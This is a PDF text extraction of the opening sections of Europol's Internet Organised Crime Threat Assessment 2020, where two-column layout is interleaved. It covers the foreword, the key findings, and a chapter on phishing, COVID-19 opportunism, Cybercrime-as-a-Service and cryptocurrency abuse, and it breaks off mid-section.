Internet Organised Crime Threat Assessment Iocta 2020 PDF

_2 IOCTA 2020
[2020]
get.password+
launch.a�ack
windows.code
launch.a�ack<
INTERNET ORGANISED CRIME THREAT ASSESSMENT (IOCTA) 2020
© European Union Agency for Law Enforcement Cooperation 2020.
Reproduction is authorised provided the source is acknowledged. For any use or

reproduction of individual photos, permission must be sought directly from the
copyright holders.This publication and more information on Europol are available on
the Internet.
www.europol.europa.eu
Contents IOCTA 2020 _3
Contents
Foreword 04 Abbreviations 05 Executive summary 06
Key findings 08 Introduction 10
1 Cross-cutting crime facilitators and

challenges to criminal investigations 11
4 Payment fraud 42
4.1 Introduction
1.1 Introduction
4.2 Increase in SIM swapping and SMishing
1.2 COVID-19 demonstrates criminal opportunism
4.3 Business Email Compromise remains a
1.3 Data compromise threat and growing area of concern
1.4 Cryptocurrencies facilitate payment for all 4.4 Online investment fraud draws in victims all
forms of cybercrime over Europe
1.5 Challenges with reporting plague ability to 4.5 Card-not-present fraud continues
create accurate overview of crime to increase as criminals diversify
1.6 Law enforcement access to data continues 4.6 Terminal attacks increase as popularity of
to challenge investigations black-box attacks soars
2 Cyber-dependent crime 23
2.1 Introduction
5 The criminal abuse of the Darkweb 54
5.1 Introduction
2.2 Ransomware 5.2 Marketplace developments
2.3 Malware 5.3 Administrators and users adapt as they aim

to enhance security and resilience
2.4 DDoS
5.4 Infrastructure preferences remain stable, but
criminals do use alternatives
3
5.5 Privacy enhancing wallets emerge as top
Child sexual exploitation online 34
threat, as privacy enhancing coins gain pop-
ularity
3.1 Introduction
5.6 Surface web platforms offer an additional
3.2 The amount of online child sexual abuse
dimension to Darkweb trading
material continues to increase
5.7 Steady supply of diverse Darkweb market
3.3 Criminals increasingly encrypt their
items
communications complicating investigations
3.4 Darkweb offender communities are
continuously evolving
3.5 Livestreaming is becoming mainstream
3.6 Commercia-lisation of online CSE is an
emerging threat
3.7 Online child sexual abuse to remain
significant threat
Recommendations 60 References 62
_4 IOCTA 2020 Foreword
Foreword
Catherine De Bolle
Executive Director of Europol
I am pleased to introduce the Internet Organised Crime email compromise and social engineering are familiar
Threat Assessment (IOCTA) 2020. cybercrime threats, their execution evolves constantly
and makes these criminal activities more complex to
The IOCTA is Europol’s flagship strategic product detect and to investigate. Ransomware in particular
highlighting the dynamic and evolving threats from remains a priority threat encountered by cyber
cybercrime. It provides a unique law enforcement- investigators across the EU. The amount of online child
focused assessment of emerging challenges sexual abuse material detected continues to increase,
and key developments in the area of cybercrime. further exacerbated by the COVID-19 pandemic, which
We are grateful for the many contributions from has had serious consequences for the investigative
our colleagues within European law enforcement capacity of law enforcement authorities.
community and to our partners in the private
industry for their input to the report. Combining law Europol is at the forefront of law enforcement
enforcement and private sector insights allows us to innovation and offers various policing solutions in
present this comprehensive overview of the threat relation to encryption, cryptocurrencies and other
landscape. challenges. The European Cybercrime Centre (EC3)
at Europol is the platform of choice for cybercrime
The data collection for the IOCTA 2020 took place investigators across the EU and beyond to connect,
during the lockdown implemented as a result of the collaborate and communicate.
COVID-19 pandemic. Indeed, the pandemic prompted
significant change and criminal innovation in the The case studies illustrating this report demonstrate
area of cybercrime. Criminals devised both new the necessity and effectiveness of international law
modi operandi and adapted existing ones to exploit enforcement cooperation in tackling cybercrime
the situation, new attack vectors and new groups of as well as the vital role played by private-public
victims. partnerships in this area. Europol provides an ideal
framework for these different stakeholders to come
The analysis for the IOCTA 2020 clearly highlights together, exchange information and take concerted
cybercrime as a fundamental feature of the European action.
crime landscape. Cybercrime remains among the
most dynamic forms of crime encountered by law
enforcement in the EU. While ransomware, business
Cybercrime affects citizens, businesses and organisations across the

EU. Europol plays a key role in countering cybercrime by working with
our many partners in law enforcement and the private sector and by
offering innovative solutions and effective, comprehensive support to
investigations. I hope this analysis can inform effective responses to
these evolving threats and make Europe safer.
_5 IOCTA 2020 Abbreviations
Abbreviations
AaaS Access-as-a-Service ISP Internet service provider
AI Artificial Intelligence IT Information technology
ATM Automated teller machine J-CAT Joint Cybercrime Action Taskforce
BEC Business email compromise KYC Know your customer
BPH Bulletproof hosting LDCA Live distant child abuse
CaaS Cybercrime-as-a-Service MaaS Malware-as-a-Service
C&C Command & control NCMEC The National Center for Missing and
Exploited Children
CNP Card-not-present
OTP One time password
CSAM Child sexual abuse material
PC Personal computer
CSE Child sexual exploitation
PGP Pretty Good Privacy
DDoS Distributed Denial of Service
POS Point of sale
DNS Domain Name System
P2P Peer-to-peer
DoH DNS over HTTPs
RaaS Ransomware-as-a-Service
E-commerce Electronic commerce
RATs Remote access tools
EC3 Europol’s European Cybercrime Centre
RDP Remote desktop protocol
E-skimming Electronic skimming
SIM Subscriber identity module
GDPR General Data Protection Regulation
SQL Structured query language
HTML Hypertext Markup Language
Tor The onion router
HTTP Hypertext Transfer Protocol
VIDTF Victim Identification Taskforce
HTTPs Hypertext Transfer Protocol Secure
VPN Virtual private network
IOCTA Internet Organised Crime Threat
Assessment VPS Virtual private server
IoT Internet of Things 2FA Two-factor authentication
IP Internet protocol

_6 IOCTA 2020 Executive summary
Executive summary
The threat landscape over the last year described in the COVID-19 crisis; a recent case shows production also
IOCTA 2020 contains many familiar main characters. takes place in the EU.
The starring roles in terms of priority threats went to
the likes of social engineering, ransomware and other Data compromise once more features as a central
forms of malware. Several interviewees captured the aspect throughout a number of threats. Both law
essence of the current state of affairs of the threat enforcement and private sector representatives
landscape by stating: cybercrime is an evolution, not consistently report on social engineering among
a revolution. As time passes, the cyber-element of the top threats. With regard to social engineering, in
cybercrime infiltrates nearly every area of criminal particular phishing, cybercriminals are now employing
activity. Key elements mentioned in previous editions a more holistic strategy by demonstrating a high level
of the IOCTA that return this year merit more, of competency when exploiting tools, systems and
rather than less, attention. The repetition means vulnerabilities, assuming false identities and working
the challenge still exists and has, in many cases, in close cooperation with other cybercriminals.
increased, underlining the need to further strengthen However, despite the trend pointing towards a growing
the resilience and response to well-known threats. sophistication of some criminals, the majority of social
The IOCTA 2020 makes clear that the fundamentals engineering and phishing attacks are successful
of cybercrime are firmly rooted, but that does not due to inadequate security measures or insufficient
mean cybercrime stands still. Its evolution becomes awareness of users. In particular, as attacks do not
apparent on closer inspection, in the ways seasoned have to be necessarily refined to be successful.
cybercriminals refine their methods and make their
The developments in the area of non-cash payment
artisanship accessible to others through crime as a
fraud over the past twelve months reflect the overall
service.
increase in sophistication and targeting of social
The COVID-19 crisis illustrated how criminals actively engineering and phishing. Fuelled by a wealth of readily
take advantage of society at its most vulnerable. available data, as well as a Cybercrime-as-a-Service
Criminals tweaked existing forms of cybercrime to fit (CaaS) community, it has become easier for criminals
the pandemic narrative, abused the uncertainty of the to carry out highly targeted attacks. As a result, law
situation and the public’s need for reliable information. enforcement and industry continue to identify well-
Across the board from social engineering to Distributed established frauds as a major threat.
Denial of Service (DDoS) attacks and from ransomware
Subscriber identity module (SIM) swapping is one of
to the distribution of child sexual abuse material
the new key trends this year, having caused significant
(CSAM), criminals abused the crisis when the rest
losses and attracted considerable attention from
of society was trying to contain the situation. The
law enforcement. As a highly targeted type of social
opportunistic behaviour of criminals during the
engineering attack, SIM swapping can have potentially
pandemic, however, should not overshadow the overall
devastating consequences for its victims, by allowing
threat landscape. In many cases, COVID-19 caused an
criminals to bypass text message-based (SMS) two-
amplification of existing problems exacerbated by a
factor authentication (2FA) measures gaining full
significant increase in the number of people working
control over their victims’ sensitive accounts.
from home. This is perhaps most noticeable in the area
of child sexual abuse and exploitation. As in previous Business Email Compromise (BEC) continues to
years, the amount of online CSAM detected continues increase. As criminals are more carefully selecting
to increase, further exacerbated by the COVID-19 their targets, they have shown a significant
crisis, which has had serious consequences for the understanding of internal business processes and
investigative capacity of law enforcement authorities. systems’ vulnerabilities. At the same time, certain
In addition, livestreaming of child sexual abuse other forms of fraud have entered the spotlight due
increased and became even more popular during the to the sheer number of victims they have generated.
Executive summary IOCTA 2020 _7
The spread of online investment fraud all over Europe forces to provide a response to shared challenges.
is not necessarily new but has generated increased This means they are able to make their business more
law enforcement attention as victims at times lose robust and in particular incorporate better security
their life savings to professional organised criminal solutions to ensure that law enforcement are unable
groups that have incorporated cyber elements into to trace them. Overall, cybercriminals are showing
their scams. an improved level of operational security and proving
to be highly aware of how to hide their identities and
The clear majority of law enforcement respondents criminal activities from law enforcement or private
once again named ransomware as a top priority threat. sector companies. With cryptocurrencies, criminals
Although this point has been made in past editions also manage to complicate law enforcement’s ability
of the IOCTA, ransomware remains one of the, if not to trace payments connected to criminal activities.
the, most dominant threats, especially for public and
private organisations within as well as outside Europe. To respond to the cybercrime challenges in a more
Considering the scale of damage that ransomware effective manner, a number of key ingredients are
can inflict, victims also appear to be reluctant to come essential. First, information sharing is at the heart
forward to law enforcement authorities or the public of any strategic, tactical and operational response
when they have been victimised, which makes it regardless of the specific type of cybercrime.
more difficult to identify and investigate such cases. Sharing information, which needs to be purpose-
Criminals continued making their ransomware attacks driven and actionable, requires reliable coordination
increasingly targeted. Ransomware has shown to and cooperation from public and private partners.
pose a significant indirect threat to businesses and At the same time, information sharing requires a
organisations, including in critical infrastructure, legal framework and attitude that is sensitive to the
by targeting supply chains and third-party service timely exchange of information, which is crucial as
providers. Perhaps one of the most crucial cybercriminals can move their infrastructure within
developments is the new way of pressuring victims the blink of an eye. This is particularly evident in the
to pay by stealing and subsequently threatening to criminal abuse of the Darkweb, where short lifecycles
auction off victims’ sensitive data. of marketplaces influences law enforcement’s ability
to conduct investigations. There is also the need
Besides ransomware, European law enforcement to foster a culture of acceptance and transparency
reported malware in the broader sense to be when organisations or individuals fall victim to
widely present in cybercrime cases. Criminals have cybercrime. Re-victimising victims after a cyber-attack
converted some traditional banking Trojans into more is counterproductive and a significant challenge, as
advanced modular malware to cover a broader scope law enforcement need companies and individuals
of functionality. These evolved forms of modular who have been subject of a crime to come forward.
malware are a top threat in the EU, especially as This can help resolve the challenges in reporting we
their adaptive and expandable nature makes them currently face. Besides information sharing through
increasingly more complicated to combat effectively. enhanced coordination and cooperation, other key
elements to include in an effective response are
With a range of threat actors, this makes drawing
prevention and awareness and capacity building.
general conclusions about particular threats
We can reduce the success rate of many forms of
challenging. In areas ranging from social engineering
cybercrime by educating individuals and organisations
and phishing, to ransomware and other forms of
in recognising criminal activity before they fall victim
malware, law enforcement authorities witness a broad
to it. It is worth underlining the importance of the
spectrum of threat actors. These actors vary in terms
responsibility of industry in integrating security and
of level of skill, capability and adaptability. The top
privacy in their design as fundamental principles,
tier criminals manage to run their operations like a
instead of shaming end users as the weakest link.
professional enterprise, whereas less sophisticated
Through capacity building, on the other hand, law
threat actors tend to rely on off-the-shelf materials
enforcement across different crime areas will be able
to conduct their criminal activities. The availability
to understand and respond to the cyber-element of
of the materials through CaaS, however, continues
crimes. Finally, taskforce work such as coordinating
to make such activities accessible. Moreover,
and de-conflicting law enforcement operational
across the board threat actors in different types of
response, for which the Europol Joint Cybercrime
cybercrime demonstrate their resilience. Perhaps
Action Taskforce (J-CAT) platform is vital, continues to
more importantly, in areas such as the Darkweb,
play a key role in the current cybercrime landscape.
criminals have enhanced their cooperation and joined
_8 IOCTA 2020 Key findings
Key findings
CROSS-CUTTING CRIME CYBER-DEPENDENT CRIME

FACILITATORS AND
CHALLENGES TO CRIMINAL
INVESTIGATIONS » Ransomware remains the most dominant threat
as criminals increase pressure by threatening
publication of data if victims do not pay.
» Social engineering remains a top threat to » Ransomware on third-party providers also

facilitate other types of cybercrime. creates potential significant damage for other
organisations in the supply chain and critical
» Cryptocurrencies continue to facilitate infrastructure.
payments for various forms of cybercrime, as
developments evolve with respect to privacy- » Emotet is omnipresent given its versatile use
oriented crypto coins and services. and leads the way as the benchmark of modern
malware.
» Challenges with reporting hinder the ability to
create an accurate overview of crime prevalence » The threat potential of DDoS attacks is higher
across the EU. than its current impact in the EU.
CHILD SEXUAL EXPLOITATION ONLINE
» The amount of online CSAM detected continues considerable resilience and are continuously
to increase, further exacerbated by the COVID-19 evolving.
crisis, which has serious consequences for the
capacity of law enforcement authorities.
» Livestreaming of child sexual abuse continues
to increase and became even more prevalent
» The use of encrypted chat apps and industry during the COVID-19 crisis.
proposals to expand this market pose a
substantial risk for abuse and make it more
» The commercialisation of online CSE is
becoming a more widespread issue, with
difficult for law enforcement to detect and
individuals uploading material to hosting sites
investigate online CSE activities.
and subsequently acquiring credit on the basis
» Online offender communities exhibit of the number of downloads.
Key findings IOCTA 2020 _9
PAYMENT FRAUD THE CRIMINAL ABUSE OF THE

DARKWEB
» SIM swapping is a key trend that allows
perpetrators to take over accounts and has » The Darkweb environment has remained volatile,
demonstrated a steep rise over the last year. lifecycles of Darkweb market places have
» BEC remains an area of concern as it has
shortened, and no clear dominant market has
risen over the past year compared to previous
increased, grown in sophistication, and become
years to fill the vacuum left by the takedowns in
more targeted.
2019.
» Online investment fraud is one of the fastest
growing crimes, generating millions in losses and
» The nature of the Darkweb community at
administrator-level shows how adaptive it
affecting thousands of victims.
is under challenging times, including more
» Card-not-present (CNP) fraud continues to effective cooperation in the search for better
increase as criminals diversify in terms of target security solutions and safe Darkweb interaction.
sectors and electronic skimming (e-skimming)
modi operandi.
» There has been an increase in the use of privacy-
enhanced cryptocurrencies and an emergence
of privacy-enhanced coinjoin concepts, such as
Wasabi and Samurai.
» Surface web e-commerce sites and encrypted
communication platforms offer an additional
dimension to Darkweb trading to enhance the
overall business model.
_10 IOCTA 2020 Introduction
Introduction
Aim editions, the team shared a survey with all the

Member States and several third-party countries. Each
The IOCTA aims to inform decision-makers at crime priority area received a survey, namely cyber-
strategic, tactical and operational levels about the dependent crime, payment fraud, and child sexual
threats of cybercrime. The 2020 IOCTA contributes exploitation (CSE). This year, as a means to gather
to setting priorities for the 2021 EMPACT operational more qualitative and in-depth information, the team
action plans, which follow the three current priorities conducted interviews with representatives from the
defined as: Member States and Europol partner countries. The
team also conducted interviews with Europol experts
1) disrupting criminal activities related to attacks from the European Cybercrime Centre (EC3) and
against information systems, particularly those members of EC3’s three advisory groups on internet
following CaaS business models and working as security, financial services and telecommunication
enablers for online crime; providers.
2) combating child sexual abuse and child sexual The semi-structured interviews contained open
exploitation, including the production and questions. As a result, the range of answers was
dissemination of child abuse material; broader than in the previous structured survey
approach wherein which respondents mainly
3) targeting criminals involved in fraud and
selected from a drop down menu. Through using
counterfeiting of non-cash means of payment,
open questions, answers became less comparable
including large-scale payment card fraud
in a traditional sense, but rather than a limitation, the
(especially card-not-present (CNP) fraud),
team perceived this is an opportunity to illustrate the
emerging threats to other non-cash means
complexity of cybercrime especially in connection to
of payment and enabling criminal activities.
establishing a comprehensive threat assessment. The
Furthermore, the IOCTA aims to consolidate
ultimate purpose of the IOCTA is to assist Member
findings on current cyber threats, which could
States in establishing priorities with respect to
contribute to the discussion of research and
cybercrime. This pertains to the type of threats but
development priorities as well as planning at the
also concerns other considerations such as how we
EU-level.
approach this crime area in terms of analysis.
Cybercrime is inherently complex for a number of

Scope reasons. With different perpetrators, different motives,
different targets, varying modi operandi, different
The scope of the 2020 IOCTA lies in the threat jurisdictions, etc. there are many variables, which
assessment of the cybercrime landscape, consisting complicate both the ability to gather data as well
of trends and developments pertinent to the as the ability to compare findings. Furthermore, the
EMPACT priorities mentioned previously. In addition quality of those findings encounter challenges as a
to this, the report will discuss other cross-cutting result of the ability to register them accurately. These
facilitators and challenges that influence or impact limitations must be taken into consideration with
the cybercrime ecosystem, such as criminal abuse respect to any threat landscape report.
of cryptocurrencies and social engineering. This
report provides an update on the latest trends and
the current impact of cybercrime within the EU and
beyond. Acknowledgements
Europol would like to extend thanks to all law
enforcement and private sector partners who
Methodological approach contributed to this report.
For this year’s IOCTA, Europol introduced a different

methodological approach to gather data. For previous
Cross-cutting crime facilitators and challenges to criminal investigations IOCTA 2020 _11
1
Cross-cutting crime facilitators
and challenges to criminal
investigations
KEY FINDINGS
• Social engineering remains • Cryptocurrencies • Challenges with reporting

an effective top threat continue to facilitate torment ability to create an
to enable other types of payments for various accurate overview of crime
cybercrime. forms of cybercrime, as prevalence across the
developments evolve with European Union.
respect to privacy oriented
crypto coins and services.
_12 IOCTA 2020 Cross-cutting crime facilitators and challenges to criminal investigations
1.1 INTRODUCTION
Throughout the interviews, one message was clear: cybercrime

is an evolution not a revolution1. The fundamentals of
cybercrime stay the same, in that cybercrime is not that much
different to other forms of more traditional crime.
This is a crucial observation to include report, whereas others are included within
in any assessment, especially as the the respective chapters of the different
emphasis when discussing cybercrime is crime areas. Several of these challenges
often placed on how quickly cybercrime pertain to the ability of law enforcement
and, in particular, cybercriminals change to execute its core mission of preventing
their tactics. Perpetrators may operate at and combatting crime, identifying
the speed of the internet, as they are able to suspects, protecting victims and arresting
quickly move parts of their infrastructure, perpetrators.
alter a particular aspect of the code, adapt
This chapter contains three key
the functionality, gather more victim data,
components. First, a reflection on
etc, but these changes do not inherently
overarching threats that are cross-
alter the threat, especially not at an abstract
cutting facilitators for other forms of
level at which we discuss the threats
cybercrime. The second part includes a
within the IOCTA. We can also witness
brief description of a general challenge
the evolution of cybercrime through the
with respect to gathering (accurate) data
integration of the cyber-component into
about the prevalence of specific forms
nearly all forms of traditional crime.
of cybercrime. The third and final part
Another reason to reflect on this focuses on challenges which pertain
observation is to understand that to to law enforcement agencies’ ability to
combat cybercrime effectively we need to conduct criminal investigations due to
respond to several challenges. Some of societal developments that criminals
these are included within this chapter of the opportunistically manage to exploit.
1.2 COVID-19 DEMONSTRATES CRIMINAL OPPORTUNISM
While discussions and models have emerged over Spread of disinformation enhances
several decades surrounding the threats posed by cybercrime opportunities
a pandemic crisis, the outbreak of COVID-19 has
demonstrated the unfortunate impact potential of The pandemic also gave rise to disinformation
such crises on our daily lives across the globe. As campaigns and activities. Disinformation efforts
physical lockdowns became the norm, cybercrime are often associated with hybrid threats, which are
became more popular than before. There is no denying defined as threats combining conventional and
that the arrival of COVID-19 was a crucial factor in unconventional, military and non-military activities
any development discussed with respect to 2020. which may be used by non-state or state actors to
However, COVID-19 in connection to cybercrime needs achieve political aims3. A wide range of measures
to be placed within its context. If anything, COVID-19 applied in hybrid campaigns include cyber-attacks
demonstrated how cybercrime – at its core – remains and disinformation, disruption of critical services,
largely the same but criminals change the narrative. undermining of public trust in governmental
They adapt the specifics of their approach to fit the institutions and exploiting social vulnerabilities. The
societal context as a means to enhance their rate presence of disinformation became a crucial feature
of success. This is not new, in many ways this is in the overall threat landscape during the crisis. Many
business as usual. The difference with COVID-19 is Member States reported problems with respect to the
that due to the physical restrictions enacted to halt spread of disinformation.
the spread of the virus, with a subsequent increase in
Users become vulnerable and receptive to
working from home and remote access to business
disinformation and fake news due to the paradoxical
resources, many individuals and businesses that
oversaturation with available information combined
may not have been as active online before the crisis
with a perceived lack of trustworthy sources of news
became a lucrative target.
that reinforce some of the users’ preconceived notions
Traditional cybercrime activities such as phishing and and beliefs. Disinformation can also be linked to
cyber-enabled scams quickly exploited the societal cybercrime in efforts to make social engineering and
vulnerability as many citizens and business were phishing attacks more impactful.
looking for information, answers and sources of help
Both seasoned cybercriminals and opportunistic
during this time. There were even more challenges for
individuals spread disinformation to benefit from it in
both individuals and business as teleworking during
different ways. Significant political motives can drive
the pandemic became the norm. Europol followed all
disinformation to influence elections or referendums
developments closely and shared its findings through
affecting entire countries. However, for criminals the
frequent corona strategic reports2.
SAFE TELEWORKING
FOR BUSINESSES FOR EMPLOYEES

Access company Report suspicious
Establish corporate data with corporate activity
policies and Provide secure remote equipment
Think before
procedures access connecting
Secure your
teleworking
Use secure remote
equipment
access Develop new
routines
Secure your corporate
Keep device operating Protect your teleworking
communications
systems and apps equipment and
updated environment
Keep business
Regularly and leisure
check in apart
with staff Be careful when using
Raise staff awareness Stay alert private devices for
about the risks of Increase your telework
teleworking security Avoid giving
monitoring out personal
information
ultimate aim is always to obtain profit. Some individuals seeking to sell items that they claim will help prevent
simply seek to obtain direct financial gain through or cure COVID-19, which emerged both on the Clearnet
digital advertisements, as engagement with fake and the Darkweb.
news messages about COVID-19 can be very high.
The number of new domains and websites related to The hybrid nature of this threat underlines the
COVID-19 soared at the start of the pandemic4. importance of a combined, hybrid response, especially
considering that law enforcement agencies are not
Another strategy to profit financially from the typically mandated with investigating cases involving
COVID-19 crisis was to spread fake news about disinformation or fake news, despite their potential to
potential cures for the virus or effective prevention bolster criminal activities.
measures. Such messages also facilitated criminals
1.3 DATA COMPROMISE

The majority of threats discussed within the IOCTA Social engineering
ultimately pertain to some form of data compromise.
Social engineering and phishing remain a key threat.
As a result, data compromise is not dealt with as a
Based on interviewee responses, both demonstrate
separate category within the different chapters but
a significant increase in volume and sophistication.
rather emphasised within this cross-cutting chapter.
While some of the increase may be attributable to
Data compromise gathers significant attention
improved reporting mechanisms, it has also become
through the obligation of organisations to report
data breaches under the General Data Protection
Regulation (GDPR). GDPR considers the protection of
data belonging to EU citizens, thus it has an ‘extra-
territorial effect’ applying to companies outside the
EU who handle data relating to EU visitors5. Since the
enactment of GDPR, over the past 18 months over 160 Law enforcement case study
000 data breach notifications have been handed in European law enforcement conducted
to authorities6, and a growth in interest over personal an investigation of ten cases of fraud
data handling among EU citizens7. In its annual data related to technical support scams. The
breach investigations report, Verizon reports how the perpetrators initially communicated mainly
company collected 157 525 incidents and 108 069 via telephone with their victims, pretending
breaches8. The authors, however, immediately place to be technicians at a software company
these figures within their proper context as 100 000+
support centre. Under the pretext that
of those breaches concerned credentials of individual
their computer and/or mobile device are
users. These are breaches where criminals target the
"infected" by malware, criminals asked
users’ credentials to gain access to bank accounts,
the victims to install remote access
cloud services, etc.
software to allegedly solve the issue.
Data compromise therefore can refer to the ability In this way, the criminals gained full
of criminals to access individual user credentials access to the computer or mobile device
or to access large databases with potentially and consequently to the - stored on the
valuable information. Examples of the latter include devices - personal data. Through use of the
data breaches at companies that often become personal data, the perpetrators transferred
public knowledge. Both of these situations are not money from the electronic bank accounts
mutually exclusive, and often form a starting point (e-banking) to bank accounts controlled by
for subsequent criminal activity. The majority of themselves or their accomplices. In many
interviewees from law enforcement authorities and cases, they even demanded the installation
private sector representatives mentioned social of remote management programmes on
engineering as a top threat, which cuts across the victims’ mobile phones, so that they
different crime areas, affecting both cyber-dependent could receive text messages (SMS) with
and cyber-enabled crime and illustrates the key role the one-use codes (OTPs), which financial
played by data compromise. institutions send for security reasons. The
investigation identified four individuals who
were active or involved as money mules.
easier for technically inexperienced criminals to Overall, cybercriminals are employing a more holistic
carry out phishing campaigns using existing criminal strategy to phishing by showing a high level of
infrastructure and support services – a trend that is competency concerning the use of tools, systems
expected to continue in the future. and vulnerabilities they exploit, assuming false
identities and working in close cooperation with other
Targeting human weakness in the security chain, cybercriminals. Regarding the latter, criminals have
social engineering and phishing have a high impact shown their sense for innovation, as they use shared
on society and enable the majority of cybercrimes, platforms to distribute their scams, which makes
ranging from scams and extortion to the acquisition of blocking or tracing difficult for incident responders.
sensitive information and the execution of advanced Criminals have also been observed maintaining a level
malware attacks. of situational awareness, with a number of phishing
campaigns having taken advantage of the COVID-19
While criminals typically employ social engineering
pandemic10.
to convince targets to engage in fraudulent schemes
unknowingly, criminals use phishing to either Further to this, criminals have also employed a much
distribute malware or to obtain credentials and gain more targeted approach when attacking their victims.
access to sensitive accounts and systems. Advanced actors focus more on selected victims
as opposed to a random group in order to optimise
financial gains, as they are becoming increasingly
More sophisticated and more targeted specialised in information gathering and victim
phishing profiling activities. As the main threat relates to spear
phishing, criminals have proven apt at adapting their
A key trend over the past year relates to the growing attacks to a specific context for fraud schemes in
sophistication9 of phishing. Phishing has become particular, for instance by improving their language
more difficult to detect, with many phishing emails skills or even using local ‘customer agents’ who
and sites being almost identical to the real ones. At communicate with their victims speaking their regional
the same time, phishing campaigns have become accents, or by making reference to current cultural,
faster and more automated, forcing respondents to political, and local events.
act quicker than before as in some cases it takes one
day from a credential leak to an attack.
FAKE NEW S
COVID-19 DISINFORMATION CAN ENDANGER PEOPLE’S LIVES
Fake products
Mistrust in
and services
official
guidelines
False
mitigation
and cures
BREAK THE CHAIN
COMMENT
SHARE
DO NOT ENGAGE
SPOT THE FAKE

REPORT IT
Share information from
official sources only
In addition to employing a targeted approach,

cybercriminals are adopting a more agile approach,
constantly looking to harvest data and sensitive
information from victims, which they can use to
enable additional crimes. Lack of security awareness Bust of hacker group selling databases
and a significant amount of open-source intelligence with millions of user credentials
surrounding personal information of employees of
Polish and Swiss law enforcement
businesses available online enable criminals to gather
the information they need. Other forms of personal authorities, supported by Europol and
information harvested and abused by criminals may Eurojust, dismantled InfinityBlack, a
include financial and personal details, as well as login hacking group involved in distributing
credentials for various sensitive accounts. stolen user credentials, creating and
distributing malware and hacking tools, and
The majority of social engineering and phishing fraud.
attacks are successful due to inadequate security
On 29 April 2020, the Polish National
measures potentially in combination with a lack
Police searched six locations in five Polish
of awareness by the users. Particularly the latter
regions and arrested five individuals
was highlighted repeatedly, as attacks do not have
to be necessarily complicated or advanced to be believed to be members of the hacking
successful – badly set up attacks still succeed by group InfinityBlack. Police seized electronic
exploiting people as the weak part of the security equipment, external hard drives and
chain. Accordingly, basic cyber hygiene and improved hardware cryptocurrency wallets, all
user awareness are some of the key success factors worth around €100 000. The police closed
in curbing part of this threat. down two platforms with databases
containing over 170 million. The hacking
Finally, cybercriminals are demonstrating an improved group created online platforms to sell user
overall level of operational security and proving to login credentials known as ‘combos’. The
be highly aware of how to hide their identities and group was efficiently organised into three
criminal activities from law enforcement or private defined teams. Developers created tools
sector companies. In some cases, once a phishing to test the quality of the stolen databases,
attempt is being investigated, the whole criminal while testers analysed the suitability of
infrastructure has already vanished. Similarly,
authorisation data. Project managers
criminals may put in place technical measures to
then distributed subscriptions against
avoid suspicion. Through their deny/allow11 lists of
cryptocurrency payments.
internet protocol (IP) addresses, for instance, criminals
may forward the user to the genuine website if certain The hacking group’s main source of revenue
conditions are met (i.e. access through a computer, came from stealing loyalty scheme login
instead of a mobile phone, or from foreign IP address). credentials and selling them on to other,
As such, only the users selected as targets by less technical criminal gangs. These gangs
criminals are re-routed to the phishing site. would then exchange the loyalty points for
expensive electronic devices.
The hackers created a sophisticated script

CaaS as a facilitator of phishing and other to gain access to a large number of Swiss
forms of cybercrime customer accounts. Although the losses
are estimated at €50 000, hackers had
Cybercrime-as-a-Service (CaaS) facilitates phishing.
Offerings on the Darkweb help criminals significantly access to accounts with potential losses
improve overall technical complexity of their of more than €610 000. The fraudsters and
attacks without the need for advanced technical hackers, among them minors and young
understanding. In recent years, CaaS has increasingly adults, were unmasked when using the
enabled even technically inexperienced criminals to stolen data in shops in Switzerland.
carry out phishing campaigns by providing exploit
kits, access to compromised systems and vulnerable
remote desktop protocols (RDPs).
Here, criminals have also been reported to make

increased use of legitimate commercial services such
as encrypted email and messaging applications as Often, these less obvious legitimate services are safer
well as Virtual private network (VPN) providers to for criminals to use and minimise risks associated
hide criminal activity, exploiting increasingly privacy- with using underground services more commonly
oriented policies, which make it difficult for law used by criminals in the past.
enforcement to gain relevant information in time.
1.4 CRYPTOCURRENCIES FACILITATE PAYMENT

FOR ALL FORMS OF CYBERCRIME
The abuse of cryptocurrencies continue to play an The extortion scam typically involves sextortion, theft
important role in facilitating payments for transactions of data or, more recently, COVID-19 related threats.
across all areas of cybercrime. Reliability, irreversibility While the majority of the population is immune to
of transactions and a perceived degree of anonymity such attempts, criminals still seem to benefit from
have made cryptocurrencies the default payment the activity. The scalability of cybercrime compared
method for victim-to-criminal payments in ransomware to traditional forms of crime presents a key challenge,
and other extortion schemes, as well as criminal-to- as cybercriminals can target a relatively large number
criminal payments on the Darkweb. These activities of potential victims with relatively low investment,
have been long established with Silk Road emerging in being able to profit despite a small percentage of
2011 and Cryptolocker hitting its first victims in 2013. responses. According to a recent study analysing
a subset of 4 million intercepted sextortion emails,
At that time, more than 20% of transactions were over 12 500 bitcoin addresses were extracted, 245
directly attributable to criminal activity. Although the of which received one or more payments13. Although
level of criminal abuse has grown substantially, the such efficiency is much lower than observed across
legitimate use of cryptocurrencies grew at a much ransomware campaigns, it is still much more lucrative
faster rate. In 2019, the overwhelming majority of when compared to traditional low-tech scams.
bitcoin transactions were linked to investment and
trading activity so, despite considerable abuse,
criminal activity corresponds to only 1.1% of total
transactions12. The figure includes transactions
Cryptocurrency users also target of
stemming from fraudulent activities, Darkweb trade, criminals
thefts and ransomware. The growing adoption of cryptocurrencies increases
the number of vulnerable victims, so it is no surprise
that thefts from individual and enterprise wallets
Criminals continue to use cryptocurrency have become more prominent over the last few years.
as a method of payment for extortion In 2019, there were 10 publicly confirmed hacks of
activities exchanges where criminals stole cryptocurrencies,
resulting in a theft of €240 million worth of assets.
Although Initial Coin Offering scams and a wide Although the number of incidents was higher than
range of Ponzi schemes abusing the increasing in any of the previous years, the total amount stolen
popularity of cryptocurrencies dominated criminal decreased compared to the previous year with €950
abuse by volume, most of the crimes reported to law million stolen in 2018, including almost €500 million
enforcement included various forms of extortion. stolen from Japanese exchange Coincheck14.
The last two years have seen an increase in extortion
spam, where the suspect attempts to frighten the
victim with a promise of a devastating event should
they not receive payment in cryptocurrency, typically
Cooperation with the private sector
bitcoin corresponding to hundreds or even thousands While a massive effort has taken place in the
of euros. While in its most basic form the suspect cryptocurrency industry to deal with proceeds from
simply expects naïve victims to trust the threat, a criminal activities, the exchanges still differ in the
slightly more advanced approach includes victims’ degree to which they address the issue and the level
passwords, typically leaked from one of the large of assistance they provide to investigators. In order
public data breaches. to assess the players across the industry, Europol is
conducting the first international law enforcement

survey15 addressing the issue of cooperation with
the major cryptocurrency exchanges and payment
services.
Looking ahead:
The cryptocurrency industry and exchanges in Malicious use of artificial
particular have continued strengthening their know
intelligence
your customer (KYC) measures, either through their
increasing effort to identify rogue clients or by a Artificial intelligence (AI) is at the heart
growing set of legislation affecting the industry. of the so-called 4th industrial revolution
